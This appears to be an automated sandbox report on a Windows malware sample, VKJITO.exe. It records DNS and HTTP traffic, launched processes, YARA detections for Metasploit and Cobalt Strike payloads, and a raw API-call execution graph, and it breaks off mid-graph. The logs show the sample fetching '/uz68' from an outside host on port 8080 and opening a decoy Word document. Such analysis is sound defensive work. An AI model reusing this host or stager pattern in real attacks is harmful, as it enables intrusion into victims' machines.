                                        Dec 18, 2024 16:30:04.798489094 CET | 57597 | 53 | 192.168.2.7 | 1.1.1.1
                                        Dec 18, 2024 16:30:06.449596882 CET | 55568 | 53 | 192.168.2.7 | 1.1.1.1
                                        Dec 18, 2024 16:30:08.444231987 CET | 50117 | 53 | 192.168.2.7 | 1.1.1.1
                                        Dec 18, 2024 16:30:08.671709061 CET | 53 | 50117 | 1.1.1.1 | 192.168.2.7
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Dec 18, 2024 16:30:04.798489094 CET | 192.168.2.7 | 1.1.1.1 | 0x7b31 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:06.449596882 CET | 192.168.2.7 | 1.1.1.1 | 0x33e5 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:08.444231987 CET | 192.168.2.7 | 1.1.1.1 | 0x2cbc | Standard query (0) | ip.sb | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Dec 18, 2024 16:30:04.940876961 CET | 1.1.1.1 | 192.168.2.7 | 0x7b31 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:06.586924076 CET | 1.1.1.1 | 192.168.2.7 | 0x33e5 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:08.671709061 CET | 1.1.1.1 | 192.168.2.7 | 0x2cbc | No error (0) | ip.sb | | 104.26.13.31 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:08.671709061 CET | 1.1.1.1 | 192.168.2.7 | 0x2cbc | No error (0) | ip.sb | | 172.67.75.172 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:08.671709061 CET | 1.1.1.1 | 192.168.2.7 | 0x2cbc | No error (0) | ip.sb | | 104.26.12.31 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:19.142230988 CET | 1.1.1.1 | 192.168.2.7 | 0x8f29 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:19.142230988 CET | 1.1.1.1 | 192.168.2.7 | 0x8f29 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 212.229.88.4 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:19.142230988 CET | 1.1.1.1 | 192.168.2.7 | 0x8f29 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 212.229.88.13 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:19.142230988 CET | 1.1.1.1 | 192.168.2.7 | 0x8f29 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 212.229.88.27 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:19.142230988 CET | 1.1.1.1 | 192.168.2.7 | 0x8f29 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 212.229.88.19 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:19.142230988 CET | 1.1.1.1 | 192.168.2.7 | 0x8f29 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 212.229.88.5 | A (IP address) | IN (0x0001) | false
                                        Dec 18, 2024 16:30:35.463352919 CET | 1.1.1.1 | 192.168.2.7 | 0xa82f | No error (0) | templatesmetadata.office.net | templatesmetadata.office.net.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                                        • ip.sb
                                        • 139.159.139.109:8080
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.7 | 49703 | 104.26.13.31 | 80 | 7396 | C:\Windows\System32\curl.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 18, 2024 16:30:08.797844887 CET | 69 | OUT | GET / HTTP/1.1
                                        Host: ip.sb
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Dec 18, 2024 16:30:09.988233089 CET | 782 | IN | HTTP/1.1 200 OK
                                        Date: Wed, 18 Dec 2024 15:30:09 GMT
                                        Content-Type: text/plain
                                        Content-Length: 13
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7yP5f6SgpoF%2BeEwIN6B%2BUDk%2FfL5PvD9TAxD2l24CbqLowd4AyauyJaS2Gyh39lxwRLn%2FeOcLL42EqyEQHhWXj5PXLbfEoSm4ILivf770%2Fq15volpeLg"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8f40314adaeb8c0b-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1804&rtt_var=902&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=69&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                        Data Ascii: 8.46.123.189


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.7 | 49705 | 139.159.139.109 | 8080 | 7380 | C:\Users\user\Desktop\VKJITO.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Dec 18, 2024 16:30:11.709899902 CET | 163 | OUT | GET /uz68 HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
                                        Host: 139.159.139.109:8080
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache



                                        Target ID:0
                                        Start time:10:30:07
                                        Start date:18/12/2024
                                        Path:C:\Users\user\Desktop\VKJITO.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\VKJITO.exe"
                                        Imagebase:0x7ff73a590000
                                        File size:505'856 bytes
                                        MD5 hash:34BFA047AACA8FD4DC99759EBF0E1A6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:10:30:07
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\curl.exe
                                        Wow64 process (32bit):false
                                        Commandline:"curl" ip.sb
                                        Imagebase:0x7ff699c10000
                                        File size:530'944 bytes
                                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:2
                                        Start time:10:30:07
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:10:30:09
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"cmd" /c start C:\Users\user\Desktop\???????.docx
                                        Imagebase:0x7ff655370000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:10:30:09
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:10:30:10
                                        Start date:18/12/2024
                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
                                        Imagebase:0x910000
                                        File size:1'620'872 bytes
                                        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:12
                                        Start time:10:30:16
                                        Start date:18/12/2024
                                        Path:C:\Windows\System32\WerFault.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164
                                        Imagebase:0x7ff6411c0000
                                        File size:570'736 bytes
                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                          Execution Graph

                                          Execution Coverage:2.7%
                                          Dynamic/Decrypted Code Coverage:0.3%
                                          Signature Coverage:32.6%
                                          Total number of Nodes:620
                                          Total number of Limit Nodes:36
27868->27870 27871 7ff73a5a575f 27869->27871 27870->27807 27871->27870 27872 7ff73a5a57f6 memmove 27871->27872 27872->27871 27873->27808 27874->27811 27875->27811 27878 7ff73a5c4346 27877->27878 27879 7ff73a5c437c GetEnvironmentStringsW 27878->27879 27894 7ff73a5c434b 27878->27894 27900 7ff73a5c4509 27878->27900 27880 7ff73a5c7649 GetLastError 27879->27880 27889 7ff73a5c4392 27879->27889 28118 7ff73a5dc260 6 API calls 27880->28118 27884 7ff73a5c7776 CloseHandle 27884->27834 27885 7ff73a5c4f52 CloseHandle 27886 7ff73a5c4f5c 27885->27886 27886->27834 27887 7ff73a5c44f5 FreeEnvironmentStringsW 27887->27900 27889->27887 28075 7ff73a5c13c0 7 API calls 27889->28075 28076 7ff73a5b3b10 23 API calls 27889->28076 27890 7ff73a5c47a6 memmove 27890->27900 27893 7ff73a5c4810 memmove 27893->27900 27899 7ff73a5c4ecb 27894->27899 27913 7ff73a5c4f77 27894->27913 27979 7ff73a5c4dd2 27894->27979 27895 7ff73a5c488b memmove 28079 7ff73a5b3b10 23 API calls 27895->28079 27896 7ff73a5c479c 27896->27884 27898 7ff73a5b67f0 26 API calls 27898->27900 27902 7ff73a5c5053 27899->27902 27908 7ff73a5c4eda 27899->27908 27900->27890 27900->27893 27900->27895 27900->27896 27900->27898 27900->27900 27903 7ff73a5c4b84 27900->27903 27905 7ff73a5c75d7 27900->27905 28077 7ff73a5b1860 6 API calls 27900->28077 28078 7ff73a5b6ca0 8 API calls 27900->28078 27901 7ff73a5c4ca5 CompareStringOrdinal 27901->27903 27902->27896 27909 7ff73a5c5079 memmove 27902->27909 27903->27894 27903->27896 27903->27901 27904 7ff73a5c4d13 27903->27904 27904->27894 27907 7ff73a5c74ef GetLastError 27904->27907 28115 7ff73a5dc330 6 API calls 27905->28115 28114 7ff73a5dc260 6 API calls 27907->28114 27929 7ff73a5c4f28 27908->27929 28080 7ff73a5c0600 27908->28080 28094 7ff73a5c1a80 memmove memmove memmove 27909->28094 27914 7ff73a5c52a7 27913->27914 27913->27979 28102 7ff73a5c1580 memmove 27913->28102 28045 7ff73a5c1810 27914->28045 27915 7ff73a5c50b7 28095 7ff73a5c8aa0 27915->28095 27919 7ff73a5c50ea 27919->27929 28101 7ff73a5bbcf0 6 API 
calls 27919->28101 27920 7ff73a5c52ba 27934 7ff73a5c52c3 27920->27934 28061 7ff73a5bbba0 27920->28061 27923 7ff73a5c5314 27925 7ff73a5bace0 6 API calls 27923->27925 27924 7ff73a5bace0 6 API calls 27942 7ff73a5c529b 27924->27942 27926 7ff73a5c5353 27925->27926 27927 7ff73a5c5373 27926->27927 27931 7ff73a5bb850 7 API calls 27926->27931 27932 7ff73a5c8aa0 28 API calls 27927->27932 27929->27979 28010 7ff73a5c5d5f 27929->28010 28107 7ff73a5c0120 6 API calls 27929->28107 27930 7ff73a5c5478 SetLastError GetSystemDirectoryW 27930->27934 27935 7ff73a5c5493 GetLastError 27930->27935 27931->27927 27932->27934 27934->27929 27934->27930 27941 7ff73a5c54ad GetLastError 27934->27941 27944 7ff73a5c54e0 27934->27944 27935->27934 27940 7ff73a5c56b5 GetLastError 27935->27940 27937 7ff73a5c8aa0 28 API calls 27937->27942 27966 7ff73a5c5552 27940->27966 27941->27934 27946 7ff73a5c760f 27941->27946 27942->27914 27942->27924 27942->27929 27942->27937 27955 7ff73a5c1580 memmove 27942->27955 28103 7ff73a5bb850 7 API calls 27942->28103 27951 7ff73a5c7701 27944->27951 27952 7ff73a5c54e9 27944->27952 28116 7ff73a5dc330 6 API calls 27946->28116 27947 7ff73a5c67de AcquireSRWLockExclusive 27972 7ff73a5c681f 27947->27972 27949 7ff73a5c65fa 28110 7ff73a5b25b0 6 API calls 27949->28110 28119 7ff73a5dc780 6 API calls 27951->28119 28064 7ff73a5b9e30 27952->28064 27955->27942 27957 7ff73a5c54f8 28068 7ff73a5bace0 27957->28068 27959 7ff73a5c68cc 27968 7ff73a5c73cf CloseHandle 27959->27968 27969 7ff73a5c73dc 27959->27969 27960 7ff73a5c5512 27961 7ff73a5c5535 27960->27961 27963 7ff73a5bb850 7 API calls 27960->27963 27964 7ff73a5c8aa0 28 API calls 27961->27964 27962 7ff73a5c57e8 SetLastError GetWindowsDirectoryW 27965 7ff73a5c5802 GetLastError 27962->27965 27962->27966 27963->27961 27964->27966 27965->27966 27973 7ff73a5c590c GetLastError 27965->27973 27966->27929 27966->27962 27974 7ff73a5c581c GetLastError 27966->27974 27978 7ff73a5c584f 27966->27978 27967 7ff73a5c5ebe 27967->27947 27967->27979 
27968->27969 27975 7ff73a5c73e6 CloseHandle 27969->27975 27976 7ff73a5c73f3 27969->27976 27970 7ff73a5c6903 27977 7ff73a5c73b8 CloseHandle 27970->27977 27971 7ff73a5c62d4 memmove 27971->28010 27972->27959 27972->27970 27991 7ff73a5c6950 27972->27991 27993 7ff73a5c70ce 27972->27993 28111 7ff73a5c9530 11 API calls 27972->28111 28014 7ff73a5c58c4 27973->28014 27974->27966 27980 7ff73a5c762c 27974->27980 27975->27976 27981 7ff73a5c73fd CloseHandle 27976->27981 27998 7ff73a5c740a 27976->27998 27977->27959 27987 7ff73a5c7726 27978->27987 27988 7ff73a5c5858 27978->27988 28015 7ff73a5c4f46 27979->28015 28093 7ff73a5b25b0 6 API calls 27979->28093 28117 7ff73a5dc330 6 API calls 27980->28117 27981->27998 27982 7ff73a5c742c ReleaseSRWLockExclusive 27982->27979 27983 7ff73a5c64d7 28109 7ff73a5b25b0 6 API calls 27983->28109 28120 7ff73a5dc780 6 API calls 27987->28120 27994 7ff73a5b9e30 memmove 27988->27994 27989 7ff73a5c718b CreateProcessW 27995 7ff73a5c7356 GetLastError 27989->27995 27996 7ff73a5c71d8 27989->27996 27997 7ff73a5c73ab CloseHandle 27991->27997 27992 7ff73a5c5993 28105 7ff73a5b81f0 12 API calls 27992->28105 27993->27989 28001 7ff73a5c738a 27993->28001 28002 7ff73a5c5867 27994->28002 27999 7ff73a5c739e CloseHandle 27995->27999 28000 7ff73a5c737b 27995->28000 28003 7ff73a5c721e CloseHandle CloseHandle CloseHandle 27996->28003 28112 7ff73a5b2de0 DeleteProcThreadAttributeList 27996->28112 27997->27977 27998->27982 27999->27997 28113 7ff73a5b2de0 DeleteProcThreadAttributeList 28000->28113 28001->27999 28007 7ff73a5bace0 6 API calls 28002->28007 28072 7ff73a5b2750 28003->28072 28009 7ff73a5c5884 28007->28009 28011 7ff73a5c58a7 28009->28011 28104 7ff73a5bb850 7 API calls 28009->28104 28010->27949 28010->27967 28010->27971 28010->27979 28010->27983 28108 7ff73a5b5320 6 API calls 28010->28108 28012 7ff73a5c8aa0 28 API calls 28011->28012 28012->28014 28014->27929 28014->27992 28015->27885 28015->27886 28016 7ff73a5bace0 6 API calls 28017 7ff73a5c59c6 28016->28017 
28017->27979 28017->27993 28017->28016 28018 7ff73a5c1580 memmove 28017->28018 28020 7ff73a5c8aa0 28 API calls 28017->28020 28106 7ff73a5bb850 7 API calls 28017->28106 28018->28017 28020->28017 28146 7ff73a5c3bf0 CreateEventW 28021->28146 28023 7ff73a5c38ad 28024 7ff73a5c38ca 28023->28024 28025 7ff73a5c38b7 CloseHandle 28023->28025 28027 7ff73a5c3bf0 5 API calls 28024->28027 28026 7ff73a5bc48c 28025->28026 28026->27843 28026->27856 28037 7ff73a5c38f6 28027->28037 28028 7ff73a5c3900 28030 7ff73a5b29b0 6 API calls 28028->28030 28029 7ff73a5c3960 WaitForMultipleObjects 28029->28037 28030->28026 28031 7ff73a5c3a7c GetLastError 28039 7ff73a5c3a32 28031->28039 28032 7ff73a5c3d10 8 API calls 28032->28037 28033 7ff73a5c39d2 GetOverlappedResult 28036 7ff73a5c3af7 GetLastError 28033->28036 28033->28037 28034 7ff73a5c3993 GetOverlappedResult 28034->28037 28038 7ff73a5c3a8e GetLastError 28034->28038 28036->28039 28037->28028 28037->28029 28037->28031 28037->28032 28037->28033 28037->28034 28037->28039 28038->28039 28152 7ff73a5b29b0 28039->28152 28041->27853 28042->27849 28046 7ff73a5c18a0 28045->28046 28050 7ff73a5c1874 28045->28050 28046->28050 28047 7ff73a5c18f8 SetLastError GetModuleFileNameW 28048 7ff73a5c1915 GetLastError 28047->28048 28047->28050 28049 7ff73a5c19c8 GetLastError 28048->28049 28048->28050 28054 7ff73a5c197a 28049->28054 28050->28046 28050->28047 28051 7ff73a5c192f GetLastError 28050->28051 28053 7ff73a5c1962 28050->28053 28051->28050 28052 7ff73a5c19eb 28051->28052 28121 7ff73a5dc330 6 API calls 28052->28121 28055 7ff73a5c1a05 28053->28055 28056 7ff73a5c196b 28053->28056 28054->27920 28122 7ff73a5dc780 6 API calls 28055->28122 28059 7ff73a5b9e30 memmove 28056->28059 28059->28054 28123 7ff73a5c1cd0 6 API calls 28061->28123 28063 7ff73a5bbbbf 28067 7ff73a5b9e5b 28064->28067 28065 7ff73a5b9f95 28065->27957 28066 7ff73a5be170 memmove 28066->28067 28067->28065 28067->28066 28069 7ff73a5bad1f 28068->28069 28124 7ff73a5c1cd0 6 API calls 28069->28124 28071 
7ff73a5bad47 28073 7ff73a5b2765 28072->28073 28074 7ff73a5b2774 ReleaseSRWLockExclusive 28072->28074 28073->28074 28074->28073 28075->27889 28076->27889 28077->27900 28078->27900 28079->27900 28081 7ff73a5c0614 28080->28081 28084 7ff73a5c0628 28080->28084 28081->27929 28082 7ff73a5c0643 28125 7ff73a5c2190 28082->28125 28084->28082 28086 7ff73a5c069d 28084->28086 28087 7ff73a5c0684 28084->28087 28085 7ff73a5c0662 28085->27929 28086->28082 28090 7ff73a5c06e0 28086->28090 28142 7ff73a5cac20 13 API calls 28087->28142 28089 7ff73a5c0697 28089->27929 28143 7ff73a5cb140 13 API calls 28090->28143 28092 7ff73a5c06f8 28092->27929 28093->28015 28094->27915 28096 7ff73a5c8abc 28095->28096 28097 7ff73a5c0600 27 API calls 28096->28097 28100 7ff73a5c8b0c 28096->28100 28098 7ff73a5c8aee 28097->28098 28099 7ff73a5c8af8 GetFileAttributesW 28098->28099 28098->28100 28099->28100 28100->27919 28102->27942 28103->27942 28104->28011 28105->28017 28106->28017 28107->27929 28108->28010 28109->27979 28110->27967 28111->27993 28112->28003 28113->28001 28123->28063 28124->28071 28128 7ff73a5c21ca 28125->28128 28126 7ff73a5c23a4 SetLastError GetFullPathNameW 28127 7ff73a5c23cf GetLastError 28126->28127 28126->28128 28127->28128 28129 7ff73a5c2457 GetLastError 28127->28129 28128->28126 28130 7ff73a5c23e4 GetLastError 28128->28130 28132 7ff73a5c2412 28128->28132 28137 7ff73a5c2236 28128->28137 28129->28137 28130->28128 28131 7ff73a5c2855 28130->28131 28144 7ff73a5dc330 6 API calls 28131->28144 28134 7ff73a5c286f 28132->28134 28135 7ff73a5c241b 28132->28135 28145 7ff73a5dc780 6 API calls 28134->28145 28138 7ff73a5c252f 28135->28138 28140 7ff73a5c286d 28135->28140 28141 7ff73a5c2694 memmove 28135->28141 28137->28085 28139 7ff73a5c277f memmove 28138->28139 28138->28140 28139->28137 28140->28085 28141->28138 28142->28089 28143->28092 28147 7ff73a5c3c7d GetLastError CloseHandle 28146->28147 28148 7ff73a5c3c2b 28146->28148 28149 7ff73a5c3caa 28147->28149 28148->28149 28151 7ff73a5c3c49 28148->28151 
28150 7ff73a5c3cc1 CloseHandle CloseHandle 28149->28150 28150->28023 28151->28023 28155 7ff73a5c3f70 28152->28155 28154 7ff73a5b29cd CloseHandle CloseHandle 28156 7ff73a5c3f92 CancelIo 28155->28156 28160 7ff73a5c3fc8 28155->28160 28157 7ff73a5c3fd0 GetLastError 28156->28157 28158 7ff73a5c3fa6 GetOverlappedResult 28156->28158 28157->28160 28159 7ff73a5c402c GetLastError 28158->28159 28158->28160 28159->28160 28160->28154 28161->27818 28164 7ff73a5c1810 12 API calls 28163->28164 28165 7ff73a5adcf8 28164->28165 28165->27743 28200 7ff73a5bbcf0 6 API calls 28165->28200 28168 7ff73a5b7ff4 28166->28168 28167 7ff73a5b8078 SetLastError GetCurrentDirectoryW 28167->28168 28169 7ff73a5b8093 GetLastError 28167->28169 28168->28167 28171 7ff73a5b80ad GetLastError 28168->28171 28172 7ff73a5b80e0 28168->28172 28169->28168 28170 7ff73a5b8148 GetLastError 28169->28170 28173 7ff73a5b80f8 28170->28173 28171->28168 28174 7ff73a5b816b 28171->28174 28175 7ff73a5b8185 28172->28175 28176 7ff73a5b80e9 28172->28176 28173->27741 28207 7ff73a5dc330 6 API calls 28174->28207 28208 7ff73a5dc780 6 API calls 28175->28208 28178 7ff73a5b9e30 memmove 28176->28178 28178->28173 28184 7ff73a5bc25c 28181->28184 28182 7ff73a5bc293 memmove 28183 7ff73a5bace0 6 API calls 28182->28183 28185 7ff73a5bc2c4 28183->28185 28184->28182 28186 7ff73a5bc2e5 28184->28186 28185->27748 28186->27748 28209 7ff73a5c0700 28187->28209 28189 7ff73a5ade05 28189->27751 28189->27752 28190 7ff73a5b86c0 CloseHandle 28190->28189 28193 7ff73a5b860b 28193->28189 28193->28190 28194 7ff73a5b8708 28193->28194 28221 7ff73a5c0e60 28193->28221 28229 7ff73a5dc700 6 API calls 28194->28229 28198 7ff73a5c42f0 121 API calls 28197->28198 28199 7ff73a5adec1 28198->28199 28199->27769 28199->27770 28201->27773 28202->27775 28210 7ff73a5c071f 28209->28210 28211 7ff73a5c2190 13 API calls 28210->28211 28217 7ff73a5c0781 28210->28217 28215 7ff73a5c0754 28211->28215 28212 7ff73a5c0857 CreateFileW 28213 7ff73a5c08e7 GetLastError 28212->28213 28214 
7ff73a5c089c 28212->28214 28213->28217 28216 7ff73a5c08ab GetLastError 28214->28216 28214->28217 28215->28212 28215->28217 28216->28217 28218 7ff73a5c08b8 SetFileInformationByHandle 28216->28218 28217->28193 28218->28217 28219 7ff73a5c0929 GetLastError CloseHandle 28218->28219 28220 7ff73a5c0948 28219->28220 28220->28217 28222 7ff73a5c0ea4 NtWriteFile 28221->28222 28223 7ff73a5c0e94 28221->28223 28224 7ff73a5c0ef1 WaitForSingleObject 28222->28224 28225 7ff73a5c0f0a 28222->28225 28223->28222 28224->28225 28226 7ff73a5c0f41 28224->28226 28227 7ff73a5c0f0e 28225->28227 28228 7ff73a5c0f1b RtlNtStatusToDosError 28225->28228 28227->28193 28228->28227 28231 7ff73a5a6482 28230->28231 28302 7ff73a5a6713 28230->28302 28232 7ff73a5a64bf 28231->28232 28233 7ff73a5a65cc 28231->28233 28234 7ff73a5a6764 28232->28234 28235 7ff73a5a64d3 28232->28235 28237 7ff73a5a65e6 28233->28237 28238 7ff73a5a6d0a 28233->28238 28234->28238 28241 7ff73a5a677e 28234->28241 28236 7ff73a5a64f1 28235->28236 28281 7ff73a5a6817 28235->28281 28239 7ff73a5a6505 28236->28239 28240 7ff73a5a699b 28236->28240 28305 7ff73a5b0810 6 API calls 28237->28305 28322 7ff73a5dc660 6 API calls 28238->28322 28243 7ff73a5a6aa3 28239->28243 28244 7ff73a5a6523 28239->28244 28240->28238 28255 7ff73a5a69b5 28240->28255 28307 7ff73a5b1440 7 API calls 28241->28307 28250 7ff73a5a6c56 28243->28250 28258 7ff73a5a6c5b memmove 28243->28258 28260 7ff73a5a6ad2 28243->28260 28275 7ff73a5a6a91 28243->28275 28251 7ff73a5a6537 28244->28251 28244->28260 28245 7ff73a5a68c5 28248 7ff73a5a68ec 28245->28248 28278 7ff73a5a6dc5 28245->28278 28309 7ff73a5b1650 memset memmove 28248->28309 28249 7ff73a5a65fd 28257 7ff73a5a6d24 28249->28257 28294 7ff73a5a6608 28249->28294 28250->28258 28265 7ff73a5a6bbf 28251->28265 28268 7ff73a5a6555 28251->28268 28252 7ff73a5a6ced 28318 7ff73a5dc330 6 API calls 28252->28318 28253 7ff73a5a6795 28261 7ff73a5a67a2 28253->28261 28262 7ff73a5a6d8c 28253->28262 28311 7ff73a5b0810 6 API calls 28255->28311 28319 
7ff73a5dc660 6 API calls 28257->28319 28316 7ff73a5a5eb0 memmove 28258->28316 28269 7ff73a5a6afb 28260->28269 28260->28275 28308 7ff73a5b10e0 15 API calls 28261->28308 28320 7ff73a5dc660 6 API calls 28262->28320 28265->28275 28280 7ff73a5a6bd9 28265->28280 28266 7ff73a5a6e30 28323 7ff73a5dc660 6 API calls 28266->28323 28284 7ff73a5a657a memmove 28268->28284 28268->28302 28313 7ff73a5af850 7 API calls 28269->28313 28271 7ff73a5a69cc 28271->28266 28277 7ff73a5a69d7 28271->28277 28273 7ff73a5a66d4 28306 7ff73a5b10e0 15 API calls 28273->28306 28325 7ff73a5dc660 6 API calls 28275->28325 28286 7ff73a5a6a01 28277->28286 28287 7ff73a5a6e7d 28277->28287 28321 7ff73a5dc660 6 API calls 28278->28321 28279 7ff73a5a6cd0 28317 7ff73a5dc330 6 API calls 28279->28317 28314 7ff73a5af850 7 API calls 28280->28314 28281->28245 28281->28252 28304 7ff73a5b0c00 9 API calls 28284->28304 28312 7ff73a5b1650 memset memmove 28286->28312 28324 7ff73a5dc660 6 API calls 28287->28324 28289 7ff73a5a6902 28310 7ff73a5b10e0 15 API calls 28289->28310 28294->28273 28294->28279 28295 7ff73a5a6c33 28315 7ff73a5b0940 7 API calls 28295->28315 28297 7ff73a5a65b0 28297->28302 28326 7ff73a5dc660 6 API calls 28297->28326 28300 7ff73a5a6b7a 28301 7ff73a5a6b88 memmove 28300->28301 28301->28302 28302->27780 28303 7ff73a5a6a1e 28303->28275 28303->28300 28303->28301 28304->28297 28305->28249 28306->28302 28307->28253 28308->28302 28309->28289 28310->28302 28311->28271 28312->28303 28313->28297 28314->28295 28315->28297 28316->28297 28327 7ff73a5aefd0 7 API calls 28328 7ff73a5c8c9f 28333 7ff73a5c2940 28328->28333 28330 7ff73a5c8cb1 28331 7ff73a5c8cc5 28330->28331 28332 7ff73a5c8dfb CloseHandle 28330->28332 28332->28331 28334 7ff73a5c29a0 GetCurrentProcessId 28333->28334 28342 7ff73a5c29b0 28334->28342 28335 7ff73a5c29c7 BCryptGenRandom 28335->28342 28337 7ff73a5c2e40 CreateNamedPipeW 28338 